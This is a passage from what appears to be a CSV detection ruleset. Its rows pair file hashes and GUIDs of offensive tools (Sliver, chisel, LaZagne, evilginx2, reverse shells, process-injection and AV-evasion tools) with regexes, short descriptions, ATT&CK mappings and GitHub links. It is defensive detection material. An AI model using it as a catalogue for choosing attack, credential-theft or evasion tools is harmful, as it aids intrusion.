- T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208*",".{0,1000}42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*42e93d295e08ea6af4885814b8cf66d43a875be0ee5b8966b5685e3e5269efb6*",".{0,1000}42e93d295e08ea6af4885814b8cf66d43a875be0ee5b8966b5685e3e5269efb6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4328364d7fbb9555b5602f2c980475917bc34f73e6839da366d52a277715c37e*",".{0,1000}4328364d7fbb9555b5602f2c980475917bc34f73e6839da366d52a277715c37e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*433d59580b95a3e3b82364729aac65643385eb4500c46eae2aab1c0567df03e6*",".{0,1000}433d59580b95a3e3b82364729aac65643385eb4500c46eae2aab1c0567df03e6.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" 
"*4347d68bd769cf25fa1046b8c9c3f5f4c1c83ae6b96ac1d3ed4b8dce7647c22c*",".{0,1000}4347d68bd769cf25fa1046b8c9c3f5f4c1c83ae6b96ac1d3ed4b8dce7647c22c.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438*",".{0,1000}436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*4370e110d8731b6b6fbb98d9ae2ffae6a3b00a8329b2700e86b15e1bd97166c1*",".{0,1000}4370e110d8731b6b6fbb98d9ae2ffae6a3b00a8329b2700e86b15e1bd97166c1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*437f2e82e5fd2de01257379e1e155f380ad173c35f32a02eeedd1a06a262e8a3*",".{0,1000}437f2e82e5fd2de01257379e1e155f380ad173c35f32a02eeedd1a06a262e8a3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*438bf6db9eece197ef8d3e133a7e229086b5682d*",".{0,1000}438bf6db9eece197ef8d3e133a7e229086b5682d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*438f9082ae1cd3bc27027e8d1a14adcc96768fe52dea5594e31487d01f0dd250*",".{0,1000}438f9082ae1cd3bc27027e8d1a14adcc96768fe52dea5594e31487d01f0dd250.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*43ac133ca47ed9916e78d39f8a3bd05bc8ef31f3925ccaa4b24e769f47e2f61f*",".{0,1000}43ac133ca47ed9916e78d39f8a3bd05bc8ef31f3925ccaa4b24e769f47e2f61f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*43b5fbace7d714684822e05f4ceb05e77ca3dc638861003086a5ea96bd7b0257*",".{0,1000}43b5fbace7d714684822e05f4ceb05e77ca3dc638861003086a5ea96bd7b0257.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*",".{0,1000}43BB3C30\-39D7\-4B6B\-972E\-1E2B94D4D53A.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*43bc3fe471a81b11c2e59cd0fd55630cee7860f8caad44fb8ee54d109e01a5e5*",".{0,1000}43bc3fe471a81b11c2e59cd0fd55630cee7860f8caad44fb8ee54d109e01a5e5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*43c1a32158fa01f876c670e53c90f43ebdf4cf61f7b8cc683f06c0c76250bb1a*",".{0,1000}43c1a32158fa01f876c670e53c90f43ebdf4cf61f7b8cc683f06c0c76250bb1a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*43da5889dce96d8f11dd09ab509217c13aad4a9cc51538633428aa9887b1039d*",".{0,1000}43da5889dce96d8f11dd09ab509217c13aad4a9cc51538633428aa9887b1039d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*440fb40172430f771a7c289ebb8257988624fdd0a95f84d0b24432a18144b4be*",".{0,1000}440fb40172430f771a7c289ebb8257988624fdd0a95f84d0b24432a18144b4be.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*441ad151017dbc879fa10de0f4b090d296ec028cbdd5587bb72a62e521c21157*",".{0,1000}441ad151017dbc879fa10de0f4b090d296ec028cbdd5587bb72a62e521c21157.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*441cb40ecc946bfb7d9ec0e7880f17f07b899adb176c6f40231aec2ab41ac1d7*",".{0,1000}441cb40ecc946bfb7d9ec0e7880f17f07b899adb176c6f40231aec2ab41ac1d7.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*4420ccad05518f31e8960f7af1dd0d50e34331ff19fc618511cf91ac557e2f3f*",".{0,1000}4420ccad05518f31e8960f7af1dd0d50e34331ff19fc618511cf91ac557e2f3f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*44321a4dc67e158e93fd037ef197dddfc4e454cacfd87f13964032edcb4b3478*",".{0,1000}44321a4dc67e158e93fd037ef197dddfc4e454cacfd87f13964032edcb4b3478.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*",".{0,1000}443D8CBF\-899C\-4C22\-B4F6\-B7AC202D4E37.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*444bb9e867be655f6c5c89b8f6f1d991417f13eeb2e1838bb42c0ac9ee5f00f7*",".{0,1000}444bb9e867be655f6c5c89b8f6f1d991417f13eeb2e1838bb42c0ac9ee5f00f7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*446c06c2d90d1afb23e58a0185087888a5225a6d16aa3949648a80c47e2430ce*",".{0,1000}446c06c2d90d1afb23e58a0185087888a5225a6d16aa3949648a80c47e2430ce.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*4477af81ed3e1c76c637314311b3923f8155896ea2e18d5ab2fa6508f46d3b4a*",".{0,1000}4477af81ed3e1c76c637314311b3923f8155896ea2e18d5ab2fa6508f46d3b4a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*44782077d86a1fd173b94e020c23dc511a58fe77e055116014c30f8ecc4ead91*",".{0,1000}44782077d86a1fd173b94e020c23dc511a58fe77e055116014c30f8ecc4ead91.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*448a280cf39fcebb006e9a66c81b9d59e884f0ed16590ac19d976e44fab7907d*",".{0,1000}448a280cf39fcebb006e9a66c81b9d59e884f0ed16590ac19d976e44fab7907d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*449CE476-7B27-47F5-B09C-570788A2F261*",".{0,1000}449CE476\-7B27\-47F5\-B09C\-570788A2F261.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*44acd66093e5cc54cdd68c183815d7c16b48b82aadd03c03bb01f3e03adf17c1*",".{0,1000}44acd66093e5cc54cdd68c183815d7c16b48b82aadd03c03bb01f3e03adf17c1.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*44ae9957842a29e354e2a64874bad57eb1790ed15ce345184ee8773c1e380e3a*",".{0,1000}44ae9957842a29e354e2a64874bad57eb1790ed15ce345184ee8773c1e380e3a.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*44D5BE95-F34D-4CC5-846F-C7758943B8FA*",".{0,1000}44D5BE95\-F34D\-4CC5\-846F\-C7758943B8FA.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*44fad118e1e7776c04d4a8fa8174ff5316ab5fa23b0e58e5c8a15c50f04ed365*",".{0,1000}44fad118e1e7776c04d4a8fa8174ff5316ab5fa23b0e58e5c8a15c50f04ed365.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*453c7fcdf6fdf446f846057eb2cd90b495caaf442aa07dbeb9655482809fef43*",".{0,1000}453c7fcdf6fdf446f846057eb2cd90b495caaf442aa07dbeb9655482809fef43.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*4551550ffe88fdd08a358197d4e3da663bca78d6896484bbf081cb70b794f27b*",".{0,1000}4551550ffe88fdd08a358197d4e3da663bca78d6896484bbf081cb70b794f27b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*4563bdbbc58eb60d27a45341223221e593db4873f378a3b018f86998187debe7*",".{0,1000}4563bdbbc58eb60d27a45341223221e593db4873f378a3b018f86998187debe7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4581d0993624a9dab870f29d66f0acb39db89b818de62d8f345de3155340066f*",".{0,1000}4581d0993624a9dab870f29d66f0acb39db89b818de62d8f345de3155340066f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*45a81bd15482f0fa6be511d3590b8c8d550e80362b5dfe10edc2488043c48cbc*",".{0,1000}45a81bd15482f0fa6be511d3590b8c8d550e80362b5dfe10edc2488043c48cbc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*45cc6eff2c3a6facb1aa9e31f2ce7d45d7b5527633c54d9deb5de1f19ffc906d*",".{0,1000}45cc6eff2c3a6facb1aa9e31f2ce7d45d7b5527633c54d9deb5de1f19ffc906d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*45D59D79-EF51-4A93-AAFA-2879FFC3A62C*",".{0,1000}45D59D79\-EF51\-4A93\-AAFA\-2879FFC3A62C.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*45ea038d3721285f2759d8c8f3740cbb9cb9400a0cf76d11d84e089bd99ed1a9*",".{0,1000}45ea038d3721285f2759d8c8f3740cbb9cb9400a0cf76d11d84e089bd99ed1a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*45ebedf8240705e9da3b89591d6e0203764e94a1ba5ebaf999627012e06bebd3*",".{0,1000}45ebedf8240705e9da3b89591d6e0203764e94a1ba5ebaf999627012e06bebd3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4614a6da343623fc820d89d35b8c2a26fe69abf357af7ef7602e52808fbe8611*",".{0,1000}4614a6da343623fc820d89d35b8c2a26fe69abf357af7ef7602e52808fbe8611.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 
"*46281222e0c038fb6b34921405aa98b5adc07d97f0074e1eb9488cab9b6b7778*",".{0,1000}46281222e0c038fb6b34921405aa98b5adc07d97f0074e1eb9488cab9b6b7778.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*464b89245a6eb6429d6588c6f9b15e5a158e41be1f7ae9ccb6e3b3ba0ca6106d*",".{0,1000}464b89245a6eb6429d6588c6f9b15e5a158e41be1f7ae9ccb6e3b3ba0ca6106d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 